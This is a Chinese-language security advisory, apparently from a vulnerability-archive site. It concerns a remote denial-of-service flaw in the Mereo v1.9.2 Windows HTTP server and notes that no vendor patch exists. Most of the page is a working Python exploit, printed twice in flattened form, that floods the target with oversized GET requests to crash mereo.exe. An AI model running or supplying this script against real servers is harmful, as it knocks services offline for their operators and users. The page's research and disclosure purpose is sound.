发布时间:2010-08-30影响版本:Mereov1.9.2漏洞描述:Mereo是运行在Windows平台上的小型HTTP服务器。远程攻击者可以通过向Mereo服务器发送恶意HT 发布时间:2010-08-30影响版本:Mereo v1.9.2漏洞描
发布时间:2010-08-30影响版本:Mereo v1.9.2漏洞描述:
Mereo是运行在Windows平台上的小型HTTP服务器。
远程攻击者可以通过向Mereo服务器发送恶意HTTP请求导致mereo.exe进程崩溃。
<*参考
CwG GeNiuS (cwggenius@gmail.com)
*>测试方法:本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
#!/usr/bin/python############################################################################# Title: Mereo v1.9.2 Remote HTTP Server DoS (0day)# By: CwG GeNiuS# Email: cwggenius [at] gmail [dot] com# Tested: XPSP3# Download: http://www.ohloh.net/p/mereo#############################################################################import socket, syspayload ="GET /";payload+="X" * 10000;payload+=" HTTP/1.1\r\n\r\n";count = 1;try:while (count <100):s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)print ("[*] Connecting to httpdx server.");s.connect((sys.argv[1], 80));print ("\n[*] Sending command.\n");s.send(payload);s.close();count = count+1;print count;except:print "Successfully Crashed!";123456789101112131415161718192021222324252627282930#!/usr/bin/python############################################################################# Title: Mereo v1.9.2 Remote HTTP Server DoS (0day)# By: CwG GeNiuS# Email: cwggenius [at] gmail [dot] com# Tested: XPSP3# Download: http://www.ohloh.net/p/mereo#############################################################################import socket, syspayload ="GET /";payload+="X" * 10000;payload+=" HTTP/1.1\r\n\r\n";count = 1;try:while (count < 100):s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)print ("[*] Connecting to httpdx server.");s.connect((sys.argv[1], 80));print ("\n[*] Sending command.\n");s.send(payload);s.close();count = count+1;print count;except:print "Successfully Crashed!";安全建议:
厂商补丁:
Mereo-----目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.assembla.com/wiki/show/mereo